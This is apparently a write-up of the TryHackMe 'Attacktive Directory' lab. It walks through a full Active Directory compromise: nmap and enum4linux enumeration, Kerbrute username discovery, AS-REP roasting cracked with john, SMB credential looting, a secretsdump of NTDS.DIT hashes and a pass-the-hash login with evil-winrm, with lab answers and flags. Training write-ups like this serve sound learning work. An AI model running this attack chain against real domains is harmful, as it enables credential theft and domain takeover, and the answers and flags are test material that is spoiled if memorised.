[Enumeration - Welcome to Attacktive Directory]

[*] Target: 10.10.49.75

[Question 1] What tool will allow us to enumerate port 139/445? => enum4linux

[Question 2] What is the NetBIOS-Domain Name of the machine? => THM-AD

[Question 3] What invalid TLD do people commonly use for their Active Directory Domain? => .local

    [+] Okay, we all know that 139 & 445 are the SMB ports, but just to make sure, let's perform a nmap scan

    # nmap 10.10.49.75 -p- -sV -sC --disable-arp-ping -Pn -T 5
        
        Not shown: 65507 closed tcp ports (reset)
        PORT      STATE    SERVICE       VERSION
        53/tcp    open     domain        Simple DNS Plus
        80/tcp    open     http          Microsoft IIS httpd 10.0
        |_http-server-header: Microsoft-IIS/10.0
        | http-methods: 
        |_  Potentially risky methods: TRACE
        |_http-title: IIS Windows Server
        88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-17 03:53:30Z)
        135/tcp   open     msrpc         Microsoft Windows RPC
        139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
        389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
        445/tcp   open     microsoft-ds?
        464/tcp   open     kpasswd5?
        593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
        636/tcp   open     tcpwrapped
        3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
        3269/tcp  open     tcpwrapped
        3389/tcp  open     ms-wbt-server Microsoft Terminal Services
        | ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
        | Not valid before: 2023-07-16T03:30:09
        |_Not valid after:  2024-01-15T03:30:09
        |_ssl-date: 2023-07-17T03:54:31+00:00; -1s from scanner time.
        | rdp-ntlm-info: 
        |   Target_Name: THM-AD
        |   NetBIOS_Domain_Name: THM-AD
        |   NetBIOS_Computer_Name: ATTACKTIVEDIREC
        |   DNS_Domain_Name: spookysec.local
        |   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
        |   Product_Version: 10.0.17763
        |_  System_Time: 2023-07-17T03:54:22+00:00
        5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
        |_http-title: Not Found
        |_http-server-header: Microsoft-HTTPAPI/2.0
        9389/tcp  open     mc-nmf        .NET Message Framing
        47001/tcp open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
        |_http-server-header: Microsoft-HTTPAPI/2.0
        |_http-title: Not Found
        49664/tcp open     msrpc         Microsoft Windows RPC
        49665/tcp open     msrpc         Microsoft Windows RPC
        49667/tcp open     msrpc         Microsoft Windows RPC
        49668/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
        49669/tcp open     msrpc         Microsoft Windows RPC
        49670/tcp open     msrpc         Microsoft Windows RPC
        49673/tcp open     msrpc         Microsoft Windows RPC
        49677/tcp open     msrpc         Microsoft Windows RPC
        49682/tcp open     msrpc         Microsoft Windows RPC
        49693/tcp open     msrpc         Microsoft Windows RPC
        49820/tcp open     msrpc         Microsoft Windows RPC
        63953/tcp filtered unknown
        Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

    [+] Exactly what I thought, SMB service is running on these port, in this case, the best tool to enumerate SMB's info is enum4linux

    # enum4linux 10.10.49.75

    =========================================( Target Information )=========================================
                                                                                                                                                                                
        Target ........... 10.10.49.75                                                                                                                                              
        RID Range ........ 500-550,1000-1050
        Username ......... ''
        Password ......... ''
        Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

    ================================( Getting domain SID for 10.10.49.75 )================================
                                                                                                                                                                                
        Domain Name: THM-AD                                                                                                                                                           
        Domain Sid: S-1-5-21-3591857110-2884097990-301047963

        [+] Host is part of a domain (not a workgroup)                                                                                                                                

    ==================( Users on 10.10.49.75 via RID cycling (RIDS: 500-550,1000-1050) )==================
                                                                                                                                                                                
                                                                                                                                                                                
        [I] Found new SID:                                                                                                                                                            
        S-1-5-21-3591857110-2884097990-301047963                                                                                                                                      

        [I] Found new SID:                                                                                                                                                            
        S-1-5-21-3591857110-2884097990-301047963                                                                                                                                      

        [+] Enumerating users using SID S-1-5-21-3591857110-2884097990-301047963 and logon username '', password ''                                                                   
                                                                                                                                                                                    
        S-1-5-21-3591857110-2884097990-301047963-500 THM-AD\Administrator (Local User)                                                                                                
        S-1-5-21-3591857110-2884097990-301047963-501 THM-AD\Guest (Local User)
        S-1-5-21-3591857110-2884097990-301047963-502 THM-AD\krbtgt (Local User)
        S-1-5-21-3591857110-2884097990-301047963-1000 THM-AD\ATTACKTIVEDIREC$ (Local User)

        [+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''                                                                  
                                                                                                                                                                                    
        S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)                                                                                      
        S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
        S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
        S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
        S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)


************************************************************************************************************************************************************************************************************************************************************


[Enumeration - Enumerating Users via Kerberos]

[*] Target: 10.10.49.75

[Question 1] What command within Kerbrute will allow us to enumerate valid usernames? => userenum

[Question 2] What notable account is discovered? (These should jump out at you) => svc-admin

[Question 3] What is the other notable account is discovered? (These should jump out at you) => backup

    [Note] I do not recomment you guys to download and use kerbrute via pip, some how it was hard to use, you can download these using the links below

        [Username List] https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt

        [Password List] https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

        [Kerbrute] https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

    # ./kerbrute_linux_amd64 userenum userlist.txt --dc=10.10.49.75 -d=spookysec.local

        __             __               __     
      / /_____  _____/ /_  _______  __/ /____ 
     / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
    / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
   /_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

    Version: v1.0.3 (9dad6e1) - 07/17/23 - Ronnie Flathers @ropnop

    2023/07/17 16:59:16 >  Using KDC(s):
    2023/07/17 16:59:16 >   10.10.49.75:88

    2023/07/17 16:59:17 >  [+] VALID USERNAME:       james@spookysec.local
    2023/07/17 16:59:21 >  [+] VALID USERNAME:       svc-admin@spookysec.local
    2023/07/17 16:59:25 >  [+] VALID USERNAME:       James@spookysec.local
    2023/07/17 16:59:27 >  [+] VALID USERNAME:       robin@spookysec.local
    2023/07/17 16:59:50 >  [+] VALID USERNAME:       darkstar@spookysec.local
    2023/07/17 17:00:03 >  [+] VALID USERNAME:       administrator@spookysec.local
    2023/07/17 17:00:25 >  [+] VALID USERNAME:       backup@spookysec.local
    2023/07/17 17:00:35 >  [+] VALID USERNAME:       paradox@spookysec.local
    2023/07/17 17:01:45 >  [+] VALID USERNAME:       JAMES@spookysec.local
    2023/07/17 17:02:09 >  [+] VALID USERNAME:       Robin@spookysec.local
    2023/07/17 17:04:30 >  [+] VALID USERNAME:       Administrator@spookysec.local
    2023/07/17 17:09:29 >  [+] VALID USERNAME:       Darkstar@spookysec.local
    2023/07/17 17:11:05 >  [+] VALID USERNAME:       Paradox@spookysec.local


************************************************************************************************************************************************************************************************************************************************************


[Exploitation Abusing Kerberos]

[*] Target: 10.10.49.75

[Question 1] We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password? => svc-admin

[Question 2] Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name) => Kerberos 5, etype 23, AS-REP

[Question 3] What mode is the hash? => 18200

[Question 4] Now crack the hash with the modified password list provided, what is the user accounts password? => management2005

    # GetNPUsers.py -dc-ip 10.10.49.75 -usersfile user.txt spookysec.local/ -request

        Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

        [-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
        $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:70eca9ff9c3fbc3e100c4006726bb218$edd31b15e51b85510347...724c8ca5ddaa9
        [-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User JAMES doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User Robin doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
        [-] User Darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set

    # echo "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:70eca9ff9c3fbc3e100c4006726bb218$edd31b15e51b85510347...724c8ca5ddaa9" > svc-admin.hash

    [Note] I did this before in a more pratical lab than this one (Link: https://github.com/Forgebreaker/THM_Cyber_Security_Training/blob/main/11.%20VulnNet:%20Roasted%20-%20Writeup.txt)

    # john svc-admin.hash --wordlist=/usr/share/eaphammer/wordlists/rockyou.txt --format=krb5asrep
    Using default input encoding: UTF-8
    Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 512/512 AVX512BW 16x])
    Will run 6 OpenMP threads
    Press 'q' or Ctrl-C to abort, almost any other key for status
    management2005   ($krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL)     
    1g 0:00:00:03 DONE (2023-07-17 17:47) 0.3021g/s 1764Kp/s 1764Kc/s 1764KC/s manaia010..mammy2007
    Use the "--show" option to display all of the cracked passwords reliably
    Session completed. 

    [>>] So now, we have a credential svc-admin:management2005


************************************************************************************************************************************************************************************************************************************************************


[Enumeration - Back to the Basics]

[*] Target: 10.10.49.75

[Question 1] What utility can we use to map remote SMB shares? => smbclient

[Question 2] Which option will list shares? => -L

[Question 3] How many remote shares is the server listing? => 6

[Question 4] There is one particular share that we have access to that contains a text file. Which share is it? => backup

[Question 5] What is the content of the file? => YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

[Question 6] Decoding the contents of the file, what is the full contents? => backup@spookysec.local:backup2517860

    # smbclient -L //10.10.49.75 -U svc-admin%management2005

                Sharename       Type      Comment
                ---------       ----      -------
                ADMIN$          Disk      Remote Admin
                backup          Disk      
                C$              Disk      Default share
                IPC$            IPC       Remote IPC
                NETLOGON        Disk      Logon server share 
                SYSVOL          Disk      Logon server share 
        Reconnecting with SMB1 for workgroup listing.
        do_connect: Connection to 10.10.49.75 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
        Unable to connect with SMB1 -- no workgroup available

    # smbclient //10.10.49.75/backup -U svc-admin%management2005 

        Try "help" to get a list of possible commands.
        smb: \> ls
        .                                   D        0  Sun Apr  5 03:08:39 2020
        ..                                  D        0  Sun Apr  5 03:08:39 2020
        backup_credentials.txt              A       48  Sun Apr  5 03:08:53 2020

                        8247551 blocks of size 4096. 3667875 blocks available
        smb: \> get backup_credentials.txt
        getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

    # cat backup_credentials.txt

        YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw <=> backup@spookysec.local:backup2517860


************************************************************************************************************************************************************************************************************************************************************


[Domain Privilege Escalation - Elevating Privileges within the Domain] + [Flag Submission - Flag Submission Panel]

[*] Target: 10.10.49.75

[Question 1] What method allowed us to dump NTDS.DIT? => DRSUAPI

[Question 2] What is the Administrators NTLM hash? => 0e0363213e37b94221497260b0bcb4fc

[Question 3] What method of attack could allow us to authenticate as the user without the password? => pass the hash

[Question 4] Using a tool called Evil-WinRM what option will allow us to use a hash? => -H

[Question 5] svc-admin => TryHackMe{K3rb3r0s_Pr3_4uth}

[Question 6] backup => TryHackMe{B4ckM3UpSc0tty!}

[Question 7] Administrator => TryHackMe{4ctiveD1rectoryM4st3r}
 
    [+] Since we have our credentail, secretsdump.py can be used to gain more interesting info

        # secretsdump.py spookysec.local/backup:backup2517860@10.10.49.75


            [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
            [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
            [*] Using the DRSUAPI method to get NTDS.DIT secrets

                Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
                Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
                krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
                spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
                spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
                spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
                spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
                spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
                spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
                spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
                spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
                spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
                spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
                spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
                spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
                spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
                spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
                ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:ba6760c5b7e873e66f3b3aed628d1baa:::
                ...

    # evil-winrm -i 10.10.49.75 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc 
                                            
        Evil-WinRM shell v3.5
                                                
        Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                                
        Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                                
        Info: Establishing connection to remote endpoint
        ...
        *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
        TryHackMe{4ctiveD1rectoryM4st3r}
        ...
        *Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt
        TryHackMe{K3rb3r0s_Pr3_4uth}
        ...
        *Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt
        TryHackMe{B4ckM3UpSc0tty!}